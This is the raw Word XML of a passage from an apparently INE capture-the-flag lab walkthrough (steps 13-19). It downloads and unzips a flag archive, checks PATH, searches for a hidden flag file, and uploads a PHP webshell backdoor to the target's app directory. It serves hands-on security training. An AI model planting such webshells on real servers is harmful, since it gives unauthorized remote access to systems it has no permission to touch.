      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="4443694E" wp14:editId="4630835A">
            <wp:extent cx="5943600" cy="2164715"/>
            <wp:effectExtent l="0" t="0" r="0" b="6985"/>
            <wp:docPr id="11470242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2420" name="Picture 1147024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C404" w14:textId="77777777" w:rsidR="00EF3114" w:rsidRPr="00EF3114" w:rsidRDefault="00EF3114" w:rsidP="00EF3114">
      <w:r w:rsidRPr="00EF3114">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Step 13:</w:t>
      </w:r>
      <w:r w:rsidRPr="00EF3114">
        <w:t xml:space="preserve"> Get the flag5.zip to local machine, open it using password 56784. The information given in the extracted file will give clue about the location of </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00EF3114">
        <w:t>the another</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00EF3114">
        <w:t xml:space="preserve"> flag.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="54D8C2DD" w14:textId="77777777" w:rsidR="00EF3114" w:rsidRPr="00EF3114" w:rsidRDefault="00EF3114" w:rsidP="00EF3114">
      <w:r w:rsidRPr="00EF3114">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Commands:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1AB88A67" w14:textId="77777777" w:rsidR="00EF3114" w:rsidRPr="00EF3114" w:rsidRDefault="00EF3114" w:rsidP="00EF3114">
      <w:r w:rsidRPr="00EF3114">
        <w:t>cd /app</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="34A25D65" w14:textId="77777777" w:rsidR="00EF3114" w:rsidRPr="00EF3114" w:rsidRDefault="00EF3114" w:rsidP="00EF3114">
      <w:r w:rsidRPr="00EF3114">
        <w:t>download flag5.zip</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="53E5CC93" w14:textId="484B168F" w:rsidR="00EF3114" w:rsidRDefault="00AD3434" w:rsidP="00EF3114">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="03AD41F9" wp14:editId="1C5F6E35">
            <wp:extent cx="5766096" cy="4076910"/>
            <wp:effectExtent l="0" t="0" r="6350" b="0"/>
            <wp:docPr id="78900700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07009" name="Picture 7890070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94C9" w14:textId="02148288" w:rsidR="00AD3434" w:rsidRPr="00EF3114" w:rsidRDefault="00AD3434" w:rsidP="00EF3114">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="67E03C86" wp14:editId="183A7361">
            <wp:extent cx="5785147" cy="844593"/>
            <wp:effectExtent l="0" t="0" r="6350" b="0"/>
            <wp:docPr id="1558250601" name="Picture 53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50601" name="Picture 53" descr="A computer code with white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F7EC" w14:textId="77777777" w:rsidR="00EF3114" w:rsidRPr="00EF3114" w:rsidRDefault="00EF3114" w:rsidP="00EF3114">
      <w:r w:rsidRPr="00EF3114">
        <w:t>Open a new Terminal.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E64EE60" w14:textId="77777777" w:rsidR="00EF3114" w:rsidRPr="00EF3114" w:rsidRDefault="00EF3114" w:rsidP="00EF3114">
      <w:r w:rsidRPr="00EF3114">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Commands:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6119CA51" w14:textId="77777777" w:rsidR="00EF3114" w:rsidRPr="00EF3114" w:rsidRDefault="00EF3114" w:rsidP="00EF3114">
      <w:r w:rsidRPr="00EF3114">
        <w:t>ls</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="35735F6A" w14:textId="77777777" w:rsidR="00EF3114" w:rsidRPr="00EF3114" w:rsidRDefault="00EF3114" w:rsidP="00EF3114">
      <w:r w:rsidRPr="00EF3114">
        <w:t>unzip flag5.zip</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2620451E" w14:textId="77777777" w:rsidR="00EF3114" w:rsidRPr="00EF3114" w:rsidRDefault="00EF3114" w:rsidP="00EF3114">
      <w:r w:rsidRPr="00EF3114">
        <w:t>cat list</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F08610C" w14:textId="3021DA9B" w:rsidR="00EF3114" w:rsidRPr="00EF3114" w:rsidRDefault="00AD3434" w:rsidP="00EF3114">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="1DCC37C4" wp14:editId="220E236A">
            <wp:extent cx="5251720" cy="3092609"/>
            <wp:effectExtent l="0" t="0" r="6350" b="0"/>
            <wp:docPr id="1048294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946" name="Picture 1048294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720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D856" w14:textId="77777777" w:rsidR="00EF3114" w:rsidRPr="00EF3114" w:rsidRDefault="00EF3114" w:rsidP="00EF3114">
      <w:r w:rsidRPr="00EF3114">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Step 14:</w:t>
      </w:r>
      <w:r w:rsidRPr="00EF3114">
        <w:t> Delete the .zip file from the directory.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="269B1FF4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28259CC6" w14:textId="77777777" w:rsidR="00EF3114" w:rsidRPr="00EF3114" w:rsidRDefault="00EF3114" w:rsidP="00EF3114">
      <w:r w:rsidRPr="00EF3114">
        <w:t>rm flag5.zip</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="45FC1632" w14:textId="77F2A44C" w:rsidR="00EF3114" w:rsidRPr="00EF3114" w:rsidRDefault="00AD3434" w:rsidP="00EF3114">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="3295F75D" wp14:editId="386D6F8D">
            <wp:extent cx="3505380" cy="1168460"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="25575138" name="Picture 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5138" name="Picture 55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53D4" w14:textId="77777777" w:rsidR="00EF3114" w:rsidRPr="00EF3114" w:rsidRDefault="00EF3114" w:rsidP="00EF3114">
      <w:r w:rsidRPr="00EF3114">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Step 15:</w:t>
      </w:r>
      <w:r w:rsidRPr="00EF3114">
        <w:t> Print checksum of file mentioned in the extracted file (Refer to Q8).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F58D9C8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3EA7D1E8" w14:textId="77777777" w:rsidR="00EF3114" w:rsidRPr="00EF3114" w:rsidRDefault="00EF3114" w:rsidP="00EF3114">
      <w:r w:rsidRPr="00EF3114">
        <w:t>checksum md5 /bin/bash</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E4F494F" w14:textId="77777777" w:rsidR="00AD3434" w:rsidRDefault="00AD3434" w:rsidP="00EF3114">
      <w:pPr>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="472C7BAF" w14:textId="0DCB60DA" w:rsidR="00EF3114" w:rsidRPr="00EF3114" w:rsidRDefault="00AD3434" w:rsidP="00EF3114">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="2FD1BCF9" wp14:editId="13C5293A">
            <wp:extent cx="4032250" cy="476550"/>
            <wp:effectExtent l="0" t="0" r="6350" b="0"/>
            <wp:docPr id="197534522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45229" name="Picture 1975345229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457" cy="476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1D094" w14:textId="77777777" w:rsidR="00EF3114" w:rsidRPr="00EF3114" w:rsidRDefault="00EF3114" w:rsidP="00EF3114">
      <w:r w:rsidRPr="00EF3114">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Step 16:</w:t>
      </w:r>
      <w:r w:rsidRPr="00EF3114">
        <w:t> Check the PATH environment variable on the remote machine.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="44FB75BD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7DE0A16F" w14:textId="77777777" w:rsidR="00EF3114" w:rsidRPr="00EF3114" w:rsidRDefault="00EF3114" w:rsidP="00EF3114">
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00EF3114">
        <w:t>getenv</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00EF3114">
        <w:t xml:space="preserve"> PATH</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D9E0DFF" w14:textId="52C851C0" w:rsidR="00EF3114" w:rsidRPr="00EF3114" w:rsidRDefault="00AD3434" w:rsidP="00EF3114">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="69F52384" wp14:editId="63CA58A1">
            <wp:extent cx="5600988" cy="1562180"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="318640483" name="Picture 5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40483" name="Picture 57" descr="A black screen with white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AE0E" w14:textId="77777777" w:rsidR="00EF3114" w:rsidRPr="00EF3114" w:rsidRDefault="00EF3114" w:rsidP="00EF3114">
      <w:r w:rsidRPr="00EF3114">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Step 17:</w:t>
      </w:r>
      <w:r w:rsidRPr="00EF3114">
        <w:t> There is a file with string “</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00EF3114">
        <w:t>ckdo</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00EF3114">
        <w:t>” in its name in one of the places included in PATH variable. Print the flag hidden in that file.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="40A10E53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7DAF6BAD" w14:textId="77777777" w:rsidR="00EF3114" w:rsidRPr="00EF3114" w:rsidRDefault="00EF3114" w:rsidP="00EF3114">
      <w:r w:rsidRPr="00EF3114">
        <w:t>search -d /</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00EF3114">
        <w:t>usr</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00EF3114">
        <w:t>/bin -f *</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00EF3114">
        <w:t>ckdo</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00EF3114">
        <w:t>*</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4DC2D0C5" w14:textId="7E30DA92" w:rsidR="00EF3114" w:rsidRPr="00EF3114" w:rsidRDefault="00AD3434" w:rsidP="00EF3114">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="333E030F" wp14:editId="3F68CA0E">
            <wp:extent cx="5232669" cy="1244664"/>
            <wp:effectExtent l="0" t="0" r="6350" b="0"/>
            <wp:docPr id="167160746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07464" name="Picture 16716074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F866" w14:textId="77777777" w:rsidR="00EF3114" w:rsidRPr="00EF3114" w:rsidRDefault="00EF3114" w:rsidP="00EF3114">
      <w:r w:rsidRPr="00EF3114">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>step 18:</w:t>
      </w:r>
      <w:r w:rsidRPr="00EF3114">
        <w:t> Change to tools directory on the local machine.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="56792AEF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0170F06A" w14:textId="77777777" w:rsidR="00EF3114" w:rsidRPr="00EF3114" w:rsidRDefault="00EF3114" w:rsidP="00EF3114">
      <w:r w:rsidRPr="00EF3114">
        <w:t>lcd /root/Desktop/tools</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="64C3C0F6" w14:textId="677E7523" w:rsidR="00EF3114" w:rsidRPr="00EF3114" w:rsidRDefault="00AD3434" w:rsidP="00EF3114">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="7960BB32" wp14:editId="6C609297">
            <wp:extent cx="5943600" cy="3392805"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="181461553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5539" name="Picture 181461553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8EE2" w14:textId="77777777" w:rsidR="00EF3114" w:rsidRPr="00EF3114" w:rsidRDefault="00EF3114" w:rsidP="00EF3114">
      <w:r w:rsidRPr="00EF3114">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Step 19:</w:t>
      </w:r>
      <w:r w:rsidRPr="00EF3114">
        <w:t xml:space="preserve"> Upload a PHP </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00EF3114">
        <w:t>webshell</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00EF3114">
        <w:t xml:space="preserve"> to app directory of the remote machine.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="434C6086" w14:textId="77777777" w:rsidR="00EF3114" w:rsidRPr="00EF3114" w:rsidRDefault="00EF3114" w:rsidP="00EF3114">
      <w:r w:rsidRPr="00EF3114">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Command:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="641FC826" w14:textId="77777777" w:rsidR="00EF3114" w:rsidRPr="00EF3114" w:rsidRDefault="00EF3114" w:rsidP="00EF3114">
      <w:r w:rsidRPr="00EF3114">
        <w:t>upload /</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00EF3114">
        <w:t>usr</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00EF3114">
        <w:t>/share/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00EF3114">
        <w:t>webshells</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00EF3114">
        <w:t>/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00EF3114">
        <w:t>php</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00EF3114">
        <w:t>/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00EF3114">
        <w:t>php-backdoor.php</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="324E40FB" w14:textId="4EB427C8" w:rsidR="00EF3114" w:rsidRPr="00EF3114" w:rsidRDefault="00AD1C92" w:rsidP="00EF3114">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="706711B9" wp14:editId="5C64FDD3">
            <wp:extent cx="5943600" cy="1110615"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="754456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569" name="Picture 754456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881E" w14:textId="77777777" w:rsidR="00EF3114" w:rsidRDefault="00EF3114"/>
    <w:sectPr w:rsidR="00EF3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C0F1B"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="5F80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10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61"/>
    <w:rsid w:val="001472D9"/>
    <w:rsid w:val="00551663"/>
    <w:rsid w:val="00595B1E"/>
    <w:rsid w:val="00853ABF"/>
    <w:rsid w:val="009A2461"/>
    <w:rsid w:val="00A76DEC"/>
    <w:rsid w:val="00AD1C92"/>
    <w:rsid w:val="00AD3434"/>
    <w:rsid w:val="00BB0BE2"/>
    <w:rsid w:val="00EF3114"/>
    <w:rsid w:val="00F6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6B69"/>
  <w15:chartTrackingRefBased/>
  <w15:docId w15:val="{439B91E7-9E19-4BF6-B0C5-43433098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D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D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8.jpeg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openxmlformats.org/officeDocument/2006/relationships/settings" Target="settings.xml"/><Relationship Id="rId21" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image16.tmp"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image3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2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/styles" Target="style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4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/webSettings" Target="webSettings.xml"/><Relationship Id="rId9" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://demo.ine.local/phpinfo.php" TargetMode="External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12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</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2025-10-09T06:59:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2025-10-09T08:02:00Z</dcterms:modified>
</cp:coreProperties>
</file>